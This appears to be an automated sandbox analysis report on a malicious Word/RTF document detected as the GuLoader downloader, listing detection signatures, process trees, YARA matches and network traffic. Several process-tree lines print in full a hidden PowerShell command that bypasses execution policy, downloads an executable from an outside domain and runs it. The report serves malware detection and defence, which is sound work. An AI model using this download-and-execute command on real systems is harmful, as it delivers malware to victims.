
Windows Analysis Report
TEPO0015922.doc

Overview

General Information

Sample Name: TEPO0015922.doc
Analysis ID: 829399
MD5: 364dc6c0e8a18b796aa535516d04cb53
SHA1: da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
SHA256: dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
Tags: doc

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Yara detected GuLoader
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1204 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 264 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1820 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2460 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 2840 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1568 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 1452 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 1320 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1832 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • verclsid.exe (PID: 1808 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 280 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: TEPO0015922.doc
Rule: SUSP_INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit (e.g. CVE-2017-11882) documents.
Author: ditekSHen
Strings:
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
Source: TEPO0015922.doc
Rule: INDICATOR_RTF_Exploit_Scripting
Description: Detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Author: ditekSHen
Strings:
  • 0xf3f9:$clsid2: 0003000000000000C000000000000046
  • 0xeb57:$ole6: D0Cf11E
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
  • 0xcad:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
Source: TEPO0015922.doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
Source: C:\Users\user\AppData\Roaming\file.exe
Rule: SUSP_NullSoftInst_Combo_Oct20_1
Description: Detects suspicious NullSoft Installer combination with common Copyright strings
Author: Florian Roth (Nextron Systems)
Strings:
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Rule: SUSP_NullSoftInst_Combo_Oct20_1
Description: Detects suspicious NullSoft Installer combination with common Copyright strings
Author: Florian Roth (Nextron Systems)
Strings:
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp
Rule: Suspicious_PowerShell_WebDownload_1
Description: Detects suspicious PowerShell code that downloads from web sites
Author: Florian Roth (Nextron Systems)
Strings:
  • 0xa9fc:$s3: System.Net.WebClient).DownloadFile('httP
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth (Nextron Systems)
Strings:
  • 0xa9bb:$sb1: -W Hidden
  • 0xa9ab:$sc1: -NoP
  • 0xa9b5:$sd1: -NonI
  • 0xa9c5:$se3: -ExecutionPolicy bypass
  • 0xa9b0:$sf1: -sta
Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp
Rule: Suspicious_PowerShell_WebDownload_1
Description: Detects suspicious PowerShell code that downloads from web sites
Author: Florian Roth (Nextron Systems)
Strings:
  • 0x91a:$s3: System.Net.WebClient).DownloadFile('httP
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp
Rule: Suspicious_PowerShell_WebDownload_1
Description: Detects suspicious PowerShell code that downloads from web sites
Author: Florian Roth (Nextron Systems)
Strings:
  • 0x329c:$s3: System.Net.WebClient).DownloadFile('httP
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth (Nextron Systems)
Strings:
  • 0x26d0:$sb1: -W Hidden
  • 0x2880:$sb1: -W Hidden
  • 0x325b:$sb1: -W Hidden
  • 0x26b0:$sc1: -NoP
  • 0x2860:$sc1: -NoP
  • 0x324b:$sc1: -NoP
  • 0x26c4:$sd1: -NonI
  • 0x2874:$sd1: -NonI
  • 0x3255:$sd1: -NonI
  • 0x26e4:$se3: -ExecutionPolicy bypass
  • 0x2894:$se3: -ExecutionPolicy bypass
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x26ba:$sf1: -sta
  • 0x286a:$sf1: -sta
  • 0x3250:$sf1: -sta
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: TEPO0015922.doc | ReversingLabs: Detection: 23%
Source: TEPO0015922.doc | Virustotal: Detection: 42%
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Users\user\AppData\Roaming\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 9_2_004027AA FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exe | Code function: 16_2_004027AA FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: file[1].exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | DNS query: name: thekaribacruisecompany.com
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global traffic | TCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49172
